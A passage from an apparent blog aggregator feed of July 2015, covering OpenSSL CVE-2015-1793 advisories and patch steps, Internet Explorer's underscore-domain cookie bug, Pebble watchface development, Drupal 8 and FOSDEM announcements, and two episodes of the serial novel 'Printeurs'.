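            fd = try_connect(ai, 300);
    freeaddrinfo(res);
    return fd;
}

int main(void)
{
    int fd = happy_connect("www.example.com", "80");   /* placeholder endpoint */
    printf(fd >= 0 ? "connected\n" : "failed\n");
    if (fd >= 0)
        close(fd);
    return 0;
}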

If you're interested, here are some IPv6 related blogposts I published a few years ago;


by Mattias Geniar at July 13, 2015 06:49 PM

Lionel Dricot

Printeurs 33

This is post 33 of 34 in the Printeurs series.

Nellio, Eva and Junior have to leave Junior's apartment in a hurry via the fire escape. They are intercepted by a drone, which Junior disables by jumping over the railing before falling into the void.

It all happened in a split second but, by reflex, I pushed Eva onto the wire-mesh floor before rushing to the railing. At the last moment, I manage to grab one of Junior's wrists.
"Aaaaah!" he goes on.
"Aaaaah!" I reply.
The railing is sawing into my armpit. Every movement Junior makes sends an unbearable jolt of pain through me. My fingers starting to give way, I stretch out my other arm.
"Grab my hand!"
"Damn it! That hurts!"
He grimaces while trying to grip my wrist.
"It hurts? Strange, I'm loving it," I say through clenched teeth.
"It was easier with the avatar!"

With a thrust of my hips, I manage to haul him up. With one hand he grabs the railing I'm braced against. Grabbing him by the underpants, I swing him, in a most inelegant way, next to Eva onto the metal floor of our landing. The three of us end up lying there, out of breath.
"I thought you did this in training," I pant.
"Well, yes… But it's the first time I've done it without an avatar."
He looks at his scraped hands.
"Damn, that hurts! And these arms are so weak. Not to mention this heart that's now pounding away. What a crappy biological body!"
I get up while trying to get my breathing back to a normal rhythm.
"Maybe, but it's the only one available right now. And since I've just risked my skin to save it, that crappy biological body, you'd better take care of it!"

Without taking the time to collect ourselves, we resume the descent. I try to concentrate on our immediate problem: how to interpret the message Max sent me? That AA-ZZ something? I hope Junior wrote it down properly!

But very quickly, hypnotised by the steady count of the steps, my eyes settle on the completely bare walls surrounding us. Wherever I look, I see nothing but uniformity. No colour. No decoration. It takes me several minutes to realise that I have only been perceiving the world this way since I removed my lenses. Before, the ads, the animations or the simple directions all helped make the space feel alive, changing. My thoughts were constantly interrupted by some novelty or other.

Since I bared my pupils, the world has become hideous, terrifying. I have become a hunted rebel; I have to fight every second to survive.

Is it only the outside world? No longer having lenses gives me a new lucidity about what I am, what I think I am, what drives me and what paralyses me. Perhaps that vision is even more frightening than the leprous, dreary façades.

This introspective descent seems endless. The metallic noise of the steps becomes unbearable; I fight mechanically not to slow down. A deep sigh of relief escapes my lips the moment my feet touch the ground of the alley. I thought I would never make it!
So as not to attract the drones' attention, we start to move away in the most natural way possible. Eva walks like a sleepwalker and I simply guide her with a touch on the forearm.
"Where are we going?" Junior asks me.
"Somewhere quiet to think about the message we've just received."
While we keep walking, he hands me a piece of toilet paper on which I make out "A12-ZZ74 000-000" in brownish letters. I can't suppress a grimace of disgust.
"Yuck! Did you really write it with your… your…?"
Junior bursts out laughing, pointing at a small red scar on his forehead.
"No, I couldn't bring myself to. So I scratched a pimple. I preferred writing with blood."
"Strange how knowing it's blood and not shit is a relief," I note without irony.
"On the other hand, I have no idea what it could mean. It's most likely the coordinates of a meeting point followed by time coordinates. But I don't see how to decode them. Tell me a bit about Max. What kind of guy is he? What clue would he give you to find him?"

Max. My memory of him is strange, hazy. There is the monstrous, wounded individual who helped me, who disappeared, who is no more than an amalgam of flesh and metal.
"But how did he get hurt?"
So I tell him about our meeting in his apartment, our conversation and the way he gave me access to an IRC channel where I could ask FatNerdz for help.
"It's actually because of that experience that I consider your apartment burned."

Junior stops dead, then smacks his fist into the palm of his hand.
"Of course, it's obvious!"
I look at him, astonished.
"The intertube! It's not officially in service yet but it's available in a good part of the city. The coordinates match; I had studied the possibility of using it to move avatars around. The 0000-0000 means 'immediate delivery without buffering at the redistribution nodes'. I should have guessed!"
"Well played. But how do we work out the location of terminal A12-ZZ74?"
"There's only one way to find out," he says with a wink, before continuing:
"On the other hand, I'm afraid Georges Farreck might intercept the message and understand what it means."
"Those coordinates were sent to me via an encrypted private message on a Tor2 node. He'll know very quickly that I received a message from Max, but it will take him quite some time to decipher its content. Probably several days."

Junior suddenly slaps his forehead with the palm of his hand.
"Shit, I forgot to lock my tablet's screen and encrypt its memory! They'll easily find the message by searching the apartment."

An explosion suddenly rings out behind us. The blast throws us to the ground; shards of glass start falling like dangerous snowflakes.
"What was that?" Junior asks.
I raise my head and see a cloud of smoke where, a few minutes earlier, we were still calmly talking.
"Your apartment!"
"Huh? You mean that…"
"That you don't need to worry about your tablet: those idiots have just solved the problem themselves."

Photo by TintedLens-Photo.

Thank you for taking the time to read this freely paid post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at July 13, 2015 03:38 PM

Dries Buytaert

Acquia announces it is ready for Drupal 8

I'm excited to announce that, starting today, Acquia is ready to fully support our customers with Drupal 8. This means our professional services, our support, our product engineering, our cloud services … the entire company is ready to help anyone with Drupal 8 starting today.

While Drupal 8 is not yet released (as it has always been said, Drupal 8 will be "ready when it's ready"), the list of release blockers is dwindling ever closer to zero, and a beta-to-beta upgrade path will soon be provided in core. These factors, along with Acquia's amazing team of more than 150 Drupal experts (including a dedicated Drupal 8 engineering team that has contributed to fixing more than 1,200 Drupal 8 issues), gives us full confidence that we can make our customers successful with Drupal 8 starting today.

In the process of working with customers on their Drupal 8 projects, we will contribute Drupal 8 core patches, port modules, help improve Drupal 8's performance and more.

I'm excited about this milestone, as Drupal 8 will be a truly ground-breaking release. I'm most excited about the architectural enhancements that strongly position Drupal 8 for what I've called the Big reverse of the Web. For the web to reach its full potential, it will go through a massive re-platforming. From Flipboard to the upcoming release of Apple News, it's clear that the web is advancing into the “post-browser” era, where more and more content is "pushed" to you by smart aggregators. In this world, the traditional end-point of the browser and website become less relevant, requiring a new approach that increases the importance of structured content, metadata and advanced caching. With Drupal 8, we've built an API-driven architecture that is well suited to this new “content as a service” approach, and Drupal 8 is ahead of competitive offerings that still treat content as pages. Check out my DrupalCon Los Angeles keynote for more details.

by Dries at July 13, 2015 01:02 PM

July 11, 2015

Lionel Dricot

Printeurs on Wattpad

TL;DR: Printeurs is now available on Wattpad. Follow me on that platform and start reading.

More than two years ago, I was wondering about the future of books and publishing. I imagined a platform where anyone could publish serials, novels and articles, a platform that would abolish the boundary between readers and authors. Two years later, the platform that seems to have the most success in that niche is without question Wattpad.

Still little known among "serious" adults, Wattpad, dedicated entirely to writing and reading, seems to be having its greatest success… among teenagers. The very people said not to read and to have no culture. On Wattpad, teenagers go wild, write kilometres of fan fiction, read, comment and critique the style of a text.

Tested and recommended by the blog authors Greg, Alias and Neil Jomunsi, and analysed by Thierry Crouzet, who sees it as the opposite of a blog, I admit I am very late for the Wattpad train.

Sure, Wattpad is full of flaws: it shows ads if you haven't installed Adblock, it doesn't allow authors to be paid, and it can't be read on my Kobo e-reader (a huge drawback as far as I'm concerned). Should I avoid it at all costs for that?

At the same time, I notice that I am not progressing as fast as I would like on my Printeurs series and that I can't manage to finish the last chapter of L'Écume du temps. Yet writing these novels gives me far more pleasure than writing a blog post. But I feel a brake, a discomfort.

What if that brake were simply the fact that I am not using the right tool? As Thierry Crouzet theorises very well in La mécanique du texte, the tool shapes the work as much as the author does. And the tool is not limited to the keyboard or the pen; it covers the whole chain between the author and the readership. Am I not trying to sculpt marble with a screwdriver?

So it is time for me to try this new tool and to announce the arrival of Printeurs on Wattpad.

For readers, the recipe is simple:

  1. Install the Wattpad application on your smartphone or tablet (or create an account via the website).
  2. Follow me!
  3. Start reading Printeurs.
  4. Don't forget to vote for each episode.

Why vote? Quite simply because it gives the story visibility on the Wattpad platform, it attracts new readers and, in the end, it can be a very strong incentive to post the next episode. So I am experimenting with the pure blackmail that seems to be the norm among Wattpad users: you want the next part? Vote!

Happy reading!

Note: I will keep publishing the Printeurs episodes on my blog, for the sake of consistency. But experience will tell whether this approach is worth continuing.

Photo by Tim Hamilton.

Thank you for taking the time to read this freely paid post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at July 11, 2015 05:26 PM

July 09, 2015

Mattias Geniar

Rethinking Security Advisory Severities


You're probably aware that the OpenSSL team disclosed a "high severity" vulnerability earlier today. You're probably aware, because the internet has been buzzing with anticipation, hype and fear that this was a new heartbleed.

Disclosing vulnerabilities

The OpenSSL team announced the upcoming patch for the vulnerability several days in advance. It followed its security policy. I'm 100% in favor of this.

However, the current OpenSSL security policy -- like that of other open source projects -- has only a limited description of these severities.

For instance, the OpenSSL team has categorised this vulnerability as a high severity issue according to this description:

high severity issues: this includes issues affecting common configurations which are also likely to be exploitable. Examples include a server DoS, a significant leak of server memory, and remote code execution.

OpenSSL Security Policy

According to the above definition, this was indeed a high severity vulnerability. It was likely to be exploitable, given the latest release of the OpenSSL codebase.

However, hardly anyone uses the latest release of OpenSSL.

Hyping Security Disclosures

The Heartbleed vulnerability got the same severity as the one from last night. Heartbleed was a disaster; CVE-2015-1793 will probably go by unnoticed. It won't get a logo. It won't get a website. It won't get its own theme song.

Why? Because CVE-2015-1793, no matter how dangerous it was in theory, concerned code that only a very small portion of the OpenSSL users were using.

But pretty much every major technology site jumped on the OpenSSL advisory. Doomsday scenarios were being created and hyped. It could be the next Heartbleed! What if it's a new Logjam? The Internet is doomed!

At this rate, the tech industry will actually become the boy who cried wolf.

Attention-seeking headlines draw more pageviews, more clicks and ultimately more revenue. It's all the fault of online advertising.

Adding context to announcements

The announcement of the forthcoming security releases was vague on details. That's obviously intentional.

The OpenSSL team is in a particularly tricky situation, though. On the one hand, their advisories are meant to warn people without giving away the real vulnerability. It's a warning sign, so everyone can keep resources at hand for quick patching, should it be needed.

At the same time, they need to warn their users of the actual severity. Publishing false advisories discredits them entirely [1].

And while the OpenSSL team can make an educated guess as to which versions of the library are most used, they cannot know for sure. If some company is embedding OpenSSL onto their devices and kept it all quiet, this recent vulnerability may have been a disaster for them.

So what's there to do?

Client/Server, Affected installs, Likelihood of exploit

Here's the part where it gets very dangerous. I'm about to make suggestions on what additional information could be safely disclosed, without giving away the actual vulnerability.

There may just be a practical limit here, where it's absolutely not feasible to do. In which case, it's probably just best to stick to the current security policy, vague as it is, and let the internet regulate itself.

Depending on your work or interest area, you may be more suspicious of server than client vulnerabilities. Heartbleed was an obvious server nightmare, whereas CVE-2015-1793 only affects the client-side of applications [2]. At the same time, if the vulnerable version of OpenSSL was used in web browsers, it would have been a disaster nonetheless.

Open question #1: should the announcement mention if it's a client- or server side bug?

A lot of Linux distributions and applications (Apache2, Nginx, OpenSSH) use OpenSSL. This is publicly known. The OpenSSL crew is undoubtedly aware of this. This puts them in a position to take into account the install base of the OpenSSL libraries whose code is vulnerable.

A vulnerability in openssl 1.0.1e (Red Hat 6.x and 7.x) or 0.9.8e (Red Hat 5.x) is going to be a lot more severe than a vulnerability in code that was just released a month ago and hasn't been adopted by distributions yet.

Open question #2: should the announcement mention the potential impacted installations?

Both questions play a vital role in determining the actual severity of a vulnerability. Yet at the same time, an advisory cannot tell exactly which versions will be affected nor can it describe the platforms that will need to install patches, since it risks giving away too much information for anyone out looking for the bug.

I'm not sure if there is a proper solution to this problem, but I'm hoping the next security advisory -- whether it's from OpenSSL, Xen, Red Hat or any other player out there -- does whatever it can to make the actual severity as clear as possible.

Doing so would reduce unnecessary hype and fear and could eventually spare a lot of (human) resources from being unnecessarily scheduled or reserved.

[1] Don't let this get into a flame war of LibreSSL vs OpenSSL vs BoringSSL, please. ;-)
[2] 'Client' is used in the broad sense, since any web application can consume an SSL/TLS stream or endpoint and act as a client on its own.


by Mattias Geniar at July 09, 2015 09:07 PM

OpenSSL CVE-2015-1793: Man-in-the-Middle Attack


As announced at the beginning of this week, OpenSSL has released the fix for CVE-2015-1793.

These releases will be made available on 9th July. They will fix a single security defect classified as "high" severity. This defect does not affect the 1.0.0 or 0.9.8 releases.
Forthcoming OpenSSL releases

More details and how to patch can be found below.

openssl

High Severity Patch

The patch is considered a high severity patch. The details are as follows, as published by the OpenSSL team.

During certificate verification, OpenSSL (starting from version 1.0.1n and 1.0.2b) will attempt to find an alternative certificate chain if the first attempt to build such a chain fails.

An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and "issue" an invalid certificate.
OpenSSL Security Advisory [9 Jul 2015]

This kind of vulnerability allows man-in-the-middle attacks and could cause applications to see invalid and untrusted SSL certificates as valid. It essentially allows anyone to become their own Certificate Authority (CA).

The bug is fixed in commit aae41f8c54257d9fa6904d3a9aa09c5db6cefd0d.

openssl_cve_2015_1793

And in commit 2aacec8f4a5ba1b365620a7b17fcce311ada93ad.

openssl_cve_2015_1793_2

Pretty damn serious, indeed. That means it's patching time again.

The "upside" is that it only affects a limited set of OpenSSL versions: OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o.

Which versions & operating systems are affected?

The vulnerability appears to exist only in OpenSSL releases that happened in June 2015 and later. That leaves a lot of Linux distributions relatively safe, since they haven't gotten an OpenSSL update in a while.

Red Hat, CentOS and Ubuntu appear to be entirely unaffected by this vulnerability, since they don't ship the OpenSSL releases from June 2015.

As confirmed by Red Hat 's announcement:

The OpenSSL project has published information about an important vulnerability (CVE-2015-1793) affecting openssl versions 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c. These upstream versions have only been available for a month, and given Red Hat's policy of performing careful backports of important bug fixes and selected features, this functionality is not present in any version of OpenSSL shipped in any Red Hat product.

No Red Hat products are affected by this flaw (CVE-2015-1793), so no actions need to be performed to fix or mitigate this issue in any way.
OpenSSL Security Fix of July 9th 2015 (CVE-2015-1793)

Just to be on the safe side, check for package updates and apply them ASAP if they're available. Especially if you have software that uses the latest OpenSSL source code or alternative repositories.

How to patch

As usual (ref: heartbleed, CVE-2015-0291 and CVE-2015-0286) with OpenSSL patches, it's a 2-step fix. First, update the library on your OS.

$ yum update openssl

or

$ apt-get update
$ apt-get install openssl

Then, find all services that depend on the OpenSSL libraries, and restart them.

$ lsof | grep libssl | awk '{print $1}' | sort | uniq

Since the attack is a man-in-the-middle attack, it's advised to restart any service or application that communicates to a remote SSL/TLS endpoint.

If anyone manages to change either the DNS of your endpoint or modify the endpoint URL altogether, and point it to their own servers, your application may still accept it as a valid SSL/TLS stream.


by Mattias Geniar at July 09, 2015 12:56 PM

July 08, 2015

Mattias Geniar

Why Internet Explorer Won’t Allow Cookies On (sub)domains With Underscores


Debugging this issue cost me some time today. Enough that I'll never forget how IE handles cookies on (sub)domains that contain underscores.

In hindsight, it seems obvious. In fact, there's even an Internet Explorer FAQ that describes how IE should react when it's presented with a domain or subdomain that contains underscores. Except at the time, I had no idea this was even related.

My Problem

My problem was that session cookies in PHP would work in Chrome and Firefox, but just refuse to work in Internet Explorer. Even the very latest version of IE, Internet Explorer 11. It's the kind of bug that appears to be by design and will stick around until the end of IE times.

Maybe Project Spartan aka Microsoft Edge will change this ancient behaviour?

What Is This Bug Of Which You Speak?

If the domain or subdomain your web application is running on contains an underscore, Internet Explorer will refuse to store cookies. Any kind of cookie. From session cookies to persistent cookies. Your webserver will reply with a Set-Cookie header and the client will happily ignore it.

This kind of domain name works: something.domain.tld
This kind of domain does not: some_thing.domain.tld

If you're working with sessions and session cookies, that's a problem. Every page refresh, the client responds with an empty Cookie: header so the server generates a new Set-Cookie header on every request.

Cookies just don't work in IE if your (sub)domain contains an underscore.

What's The Cause?

According to Microsoft, this behaviour was introduced with kb316112. It's a Windows patch designed to resolve security bulletin MS01-055, which dates back to 2001.

It's a cookie vulnerability. From 2001. For which we still experience the consequences.

The original bulletin fixed this particular problem:

This patch eliminates three vulnerabilities affecting Internet Explorer. The first involves how IE handles URLs that include dotless IP addresses.

If a web site were specified using a dotless IP format (e.g., http://031713501415 rather than http://207.46.131.13), and the request were malformed in a particular way, IE would not recognize that the site was an Internet site. Instead, it would treat the site as an intranet site, and open pages on the site in the Intranet Zone rather than the correct zone.

This would allow the site to run with fewer security restrictions than appropriate.
MS01-051

So why does the fix for that CVE still affect us today?

As part of the fix in kb316112, Microsoft introduced stricter validation for domain names in DNS. That essentially means all domain names must follow the DNS RFC. Its origin dates back to RFC606 (1973) and RFC608 (1974).

Guess what the original DNS syntax does not contain? That's right: underscores.

So Microsoft started preventing cookies on anything that contains invalid DNS characters.

Security patch MS01-055 prevents servers with improper name syntax from setting cookies names. Domains that use cookies must use only alphanumeric characters ("-" or ".") in the domain name and the server name.

Internet Explorer blocks cookies from a server if the server name contains other characters, such as an underscore character ("_").
Security Patch MS01-055

Here's where I think they went wrong, though.

Underscores are indeed not allowed in host names, but they are allowed in domain names. The difference is the interpretation of a "host name" vs. a "domain name".

RFC2181, published in 1997, clearly states this.

The DNS itself places only one restriction on the particular labels that can be used to identify resource records. That one restriction relates to the length of the label and the full name. [...]

Implementations of the DNS protocols must not place any restrictions on the labels that can be used. In particular, DNS servers must not refuse to serve a zone because it contains labels that might not be acceptable to some DNS client programs.

RFC2181

To me, it seems like Microsoft introduced a wrong kind of validation and mixed host names with domain names.

So How Do I Fix It?

Just send a Pull Request to the IE11 codebase with the fix!

Well, since that's obviously not an option, there really is no alternative but to avoid underscores in your (sub)domains on the internet. This can be especially annoying for auto-generated subdomains (where I experienced it), where underscores could accidentally be introduced and break things in unexpected ways, for IE users.
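If you generate subdomains programmatically, it can help to validate the labels up front. The following is a small illustrative helper (hypothetical, not from the original post) that accepts only the strict host-name syntax (letters, digits and hyphens, no leading or trailing hyphen), so an accidental underscore is caught before IE silently drops your cookies.

/* hostname_label_ok.c -- an illustrative check for auto-generated subdomain
 * labels: only letters, digits and hyphens, no leading or trailing hyphen,
 * 1..63 characters, per the classic host-name syntax that IE's cookie
 * validation expects. Build with: cc hostname_label_ok.c
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

int hostname_label_ok(const char *label)
{
    size_t len = strlen(label);
    if (len == 0 || len > 63)
        return 0;
    if (label[0] == '-' || label[len - 1] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)label[i];
        if (!isalnum(c) && c != '-')
            return 0;                 /* rejects underscores, among others */
    }
    return 1;
}

int main(void)
{
    printf("%d\n", hostname_label_ok("some-thing"));  /* 1: fine */
    printf("%d\n", hostname_label_ok("some_thing"));  /* 0: IE will drop cookies */
    return 0;
}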

For the future, I hope Microsoft reviews this policy of setting cookies on domains that include an underscore. Maybe they're correct in following the RFC & standards (although this is debatable), but they're the only browser that appears to be doing so.

At what point should you abandon principle and instead follow the masses in adopting non-standard practices?


by Mattias Geniar at July 08, 2015 08:38 PM

Xavier Mertens

$HOME Sweet $HOME

Yesterday, I talked at RMLL (“Rencontres Mondiales du Logiciel Libre“), or LSM in English (“Libre Software Meeting“), held in Beauvais, France. The presentation title was “$HOME Sweet $HOME” and it covered the security of our home networks in the face of the invasion of connected gadgets, also known as the Internet of Things. I gave some tips & tricks to improve your security when you connect such devices to your network.

The slides are online and the talk was recorded. The video should be available soon on video.rmll.info.

by Xavier at July 08, 2015 07:48 AM

Kristof Willen

Spiro

Programming

Even more Pebble adventures! Now that Skylines was thriving in the Pebble appstore, I decided to create a watchface for the new Pebble Time, so I'd have something to show off when my Pebble Time arrives in August. And what better app to implement than some colorful spirographs?

It took quite a while to finish this: as I didn't have my Pebble Time yet, I had no real hardware to test the app on, so I had to rely solely on the Pebble emulator on my computer. Eventually, I came up with a first version which I published on the appstore. However, soon enough, several people remarked that the app was slow and crash prone. It turned out the app used quite a few sine/cosine functions, which were the cause of all those slowdowns. Hard to believe that my 20-year-old HP pocket calculator was more powerful than a wearable with a modern ARM chipset!

So it was clear I couldn't use the standard sine/cosine functions. Pebble has a workaround in the SDK with sin_lookup functions, which use a precalculated table. However, these are mostly oriented towards animating the hands of analogue watches, and the generated values didn't make any sense to me. So I quickly programmed my own cosine/sine lookup table and used the standard hypotrochoid equations. This worked a lot better and quicker, but it still needed a lot of iterations to come up with a decent spirograph. And in some cases, the spirograph turned into gibberish. More debugging revealed that this was due to events coming in while the Pebble was generating the spirograph, like the flick_wrist_to_update option I added to the watchface.
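For illustration, here is a minimal, standalone sketch of that kind of integer lookup table (an assumed reconstruction of the idea, not the actual Spiro source): precompute a quarter sine wave as scaled integers once, then derive every other angle by symmetry, so no floating-point sin()/cos() is needed while drawing.

/* sine_table.c -- a hypothetical standalone sketch of the lookup-table idea,
 * not the actual Spiro source. One quarter wave is precomputed as scaled
 * integers; every other angle is derived by symmetry, so drawing needs no
 * floating-point sin()/cos(). Build with: cc -std=c99 sine_table.c -lm
 */
#include <stdio.h>
#include <math.h>

#ifndef M_PI
#define M_PI 3.14159265358979323846
#endif

#define TABLE_SIZE 91      /* 0..90 degrees, one entry per degree */
#define FIXED_ONE  10000   /* fixed-point scale: 1.0 == 10000 */

static int sine_table[TABLE_SIZE];

/* Fill the quarter-wave table once; on the watch you would ship it as a
 * constant array instead of computing it at startup. */
static void build_table(void)
{
    for (int deg = 0; deg < TABLE_SIZE; deg++)
        sine_table[deg] = (int)lround(sin(deg * M_PI / 180.0) * FIXED_ONE);
}

/* Integer sine for any angle in degrees, scaled by FIXED_ONE. */
static int isin(int deg)
{
    deg = ((deg % 360) + 360) % 360;   /* normalise to 0..359 */
    if (deg <= 90)  return  sine_table[deg];
    if (deg <= 180) return  sine_table[180 - deg];
    if (deg <= 270) return -sine_table[deg - 180];
    return -sine_table[360 - deg];
}

static int icos(int deg)
{
    return isin(deg + 90);
}

int main(void)
{
    build_table();
    /* sample a hypotrochoid-style term: (R - r) * cos(t), with R=60, r=25 */
    for (int t = 0; t < 360; t += 45)
        printf("t=%3d  sin=%6d  cos=%6d  x=%7d\n",
               t, isin(t), icos(t), (60 - 25) * icos(t));
    return 0;
}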

So eventually, I turned to the default Pebble SDK sin_lookup/cos_lookup functions and implemented my own hypotrochoid equations on top of them. This time, everything worked without any glitches. The result is Spiro, a colorful watchface for the Pebble Time and for the original Pebble (only in B&W, of course).

by kristof at July 08, 2015 06:28 AM

Skylines

Programming

Now that my Pebble NMBS app is wrapped up, I decided to have a look at the SDK2 for Pebble and build a watchface with it. I didn't need to search long for inspiration for a new watchface: on the Moto360, someone made clever use of the black horizontal bezel at the bottom of the screen, adding some scenery to it, as if it were a shadow (the default was a man sitting on a bench in the park). So I took the skyline of Prague, converted it to B&W, and I had my first watchface, which I called Skylines.

The app has since been extended with skylines of up to 30 cities from all over the world. I also included a random mode, where the skyline changes every two hours. Just like being on a world trip! I also added a Night mode, where the screen inverts and a beautiful night sky appears between 8pm and 6am.

All in all, programming in C went quite well, considering I hadn't touched C in the last 20 years. The only problem was the implementation of the configuration window, which was a bit of a hassle. It turned out I had defined my app as SDK3 compatible, which seemed to be the cause of the errors.

by kristof at July 08, 2015 06:11 AM

July 07, 2015

FOSDEM organizers

Next FOSDEM: 30 & 31 January 2016

FOSDEM 2016 will take place at ULB Campus Solbosch on Saturday 30 and Sunday 31 January 2016. Further details and calls for participation will be announced in the coming weeks and months. Have a nice summer!

July 07, 2015 03:00 PM

July 06, 2015

Lionel Dricot

Printeurs 32

143632128_931f695dcf_z
Ceci est le billet 32 sur 34 dans la série Printeurs

By connecting to an avatar, Nellio reached the laboratory, where he started printing the contents of his memory card. Eva seems hysterical and is screaming. Taking back control of the situation, Junior Freeman injected Eva with a sedative before disconnecting Nellio and sending him into an out-of-service avatar.

— Nellio? Nellio? Nellio, wake up!

My eyes snap open and I sit up. I feel as if I am being born, pulling myself out of nothingness. Where am I? When am I? What is my past? I am completely disoriented; I can't find a single memory to hold on to. A blurry face topped with a red tangle of hair leans over me.

— Sorry, Nellio! I didn't have time to talk it over. I transferred you into an out-of-service avatar so you couldn't do any damage.

Avatar? Damage? Slowly the pieces of the puzzle fall back into place.
— Where… where are we?
— At my place, in my apartment. But we have little time to lose. My colleagues will very quickly figure out what happened.
— But… how did we get here?

With his finger, he points at an avatar standing in the front doorway, frozen in a grotesque position.
— I brought your girlfriend here with the avatar before going to fetch our two bodies from the police station and programming a delayed disconnection. I was a bit optimistic: I got ejected from the avatar barely a step through the door. I reconnected to my biological body while it was in mid-fall towards the floor. I'll spare you the landing…
He shows me the bruises on his elbows. The fog numbing my brain clears little by little.
— My girlfriend? What girlfr… Eva!
— Don't worry, she's sleeping peacefully and will wake up any moment now.
Turning my head, I see Eva's body resting peacefully on an old soft-plastic couch. Junior has tucked her in under an old blanket. Gently, I come closer and stroke her hair. Her breathing quickens, her eyes half-open and a kind of muffled cry starts to rise from her mouth. Taking her in my arms, I do my best to reassure her. She speaks with difficulty.
— Nel… lio?

Junior hands me a cup of water which I bring to her lips. Eva tries to drink but, like a child, doesn't seem to understand how to use her lips. Her swallowing is jerky, as if out of sync. The water streams down her face and soaks the blanket.

— I'll lend her some clothes, Junior continues. And then we'll have to run. We have very little time. We'll have to smear ourselves with anti-recognition makeup and find a hideout.

He turns abruptly towards me.

— Can you believe it? You barge into my quiet little life and, a few hours later, I'm a wanted criminal. I should hold it against you but, honestly, I've never had so much fun. It's damn exciting! Especially since from now on we'll be carrying on without avatars, in plain biological bodies. Quite the challenge!

Letting out a big burst of laughter, he starts throwing oversized t-shirts and unflattering clothes at me.
— Perfect, that will break the drones' silhouette recognition. These are old rags, no chips or built-in electronics. On the other hand, I have no idea where we could take shelter.
— Let's try to put some order in our thoughts, I reason. What is Georges Farreck's goal in all this? If he wanted to eliminate me, he could have done it already. If he hasn't, it's because I'm still indispensable to him for setting up the printeurs. So he doesn't have all the pieces.
– That would explain how relatively easily I managed to escape: the police have orders not to kill you!
— He lost Eva, he doesn't want to lose me too; that holds up. But his behaviour is still strange.
— OK, but what do we do now? That's what matters most!

I think for a moment.
— Junior, are you ready to sacrifice your apartment? To never come back to it?
— Well, I think that's already the case, I'm burned! To be honest, as a special unit my life was mostly at the police station anyway.
— Give me a tablet with a connection to a Tor2 node.

He grabs a thin screen and hands it to me. Typing quickly, I connect to IRC. I can't remember the name of the channel Max had recommended, a long string of hexadecimal characters, but I remember very well which server to connect to. In a few seconds, I create an account and join the busiest public channel.

"Max, FatNerdz: Eva lost the key to mom's wifi. Please send it to me in a PM."

Junior gives me a questioning look.
— But what does that mean?
— That, you see, is a trouble magnet. It means your apartment is about to be wiped off the map and that we have to leave it as fast as possible.
— Huh?

His smile has abruptly vanished.

— But why did you do that?
— Because I'm hoping Max or FatNerdz will send me an answer before the explosion.
— And if they don't?
— We won't have time to worry about it.
— Shit! Shit! Shit!

A line suddenly appears in the IRC client.
— A private message! It's from Max. A single word: "A12-ZZ74 000-000". Write it down!
— Well, copy-paste it into my note-taking app.
— No, we can't take any electronic equipment with us. Write it down on paper.
— Paper? You're hilarious! I don't have that kind of stuff, I'm not a museum!
— Not even in your toilet?
He looks at me, surprised.
— You do have paper in your toilet, right? Don't tell me you make do with three seashells!
— Well… yes, I have paper. But what do I write with?
— With whatever you find in your toilet that lets you write on that kind of paper, I say with a wink.
— But… that's absolutely disgusting!
— Your apartment is going to blow any minute now.
— Shit! Shit!
— Quite literally!
— You bastard, he says, rushing to the toilet.
I hear his voice, muffled by the door.
— Repeat what I have to write down.
— A12-ZZ74 000-000
— A12-ZZ74 000-000?
— Yes, that's it. Let's get out of here!

Each taking an arm, we grab hold of Eva, who is swimming in her old oversized t-shirt. She looks dazed but follows us without the slightest resistance. Her clumsy movements seem to be gaining strength. Four steps at a time, we race down the fire escape at the back of the building.

The stairs are rusty, a swirling wind keeps throwing me off balance, and I realize with dread that Junior lived on one of the highest floors. The cheapest ones, in this kind of building where the elevators are no longer maintained.

Every step feels like an ordeal. To distract myself, I try to put myself in Georges Farreck's shoes. What are his motivations? What was his plan from the beginning? What will his next move be? Am I not being completely paranoid? Isn't he trying to help me?

A drone suddenly starts fluttering around us. A voice bursts out of it.
— You are using the emergency stairs while no alert has been recorded. Please show me your face and state the reason for your presence.
— It can't recognize our faces thanks to your makeup, I whisper, turning my back to the drone.
— It probably hasn't contacted headquarters yet, Junior replies. If we manage to trigger the killswitch by flipping it over, it will shut down and crash thirty floors below.
— Problem: it's staying out of reach, more than a metre from the railing.
— I've done this kind of thing in training.

Junior gives me a wink and suddenly jumps onto the barrier, throwing himself into the void feet first. At the last moment, his hands catch the railing while, with a prodigious thrust of his hips, he grabs the drone between his ankles and flips it over. The automated machine instantly drops like a stone while Junior hangs on by his fingertips.
— Aaaaah! he screams.
His fingers hold for a second before giving way and slipping open, sending him plummeting to his death.

 

Photo by Ioan Sameli.

Thank you for taking the time to read this freely priced post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at July 06, 2015 06:57 PM

July 05, 2015

Mattias Geniar

Rewriting software from scratch, a lesson learned from Mac OSX 10.10.4’s discoveryd


I've been struggling with slow logins when on an active directory domain on my Mac. I've tried pretty much everything, but nothing really seems to solve it permanently. I've sort of become accustomed to the problem, accepting it as-is.

But I'm hoping the Mac OSX 10.10.4 update that was just released will resolve this for me, at last.

Most of the internet agrees that the introduction of discoveryd in Mac OSX has been a failure. It was meant to replace a very old DNS resolving tool called mDNSResponder, but it never lived up to the expectation.

As a Mac user, I had never experienced problems with the "old" mDNSResponder. There may have been a few edge-cases I was unaware of, sure. But to me, it just seemed to work. Before Mac OSX 10.10, I never experienced any of the declining software quality concerns others had raised.

Now enter Mac OSX 10.10. Apple completely rewrote the mDNSResponder and replaced it with discoveryd. From the ground up.

Here's a processlist of Mac OSX 10.10.3.

$  ps -ef | grep discoveryd
   65    74  Fri10am /usr/libexec/discoveryd --udsocket standard --loglevel Basic --logclass Everything --logto asl
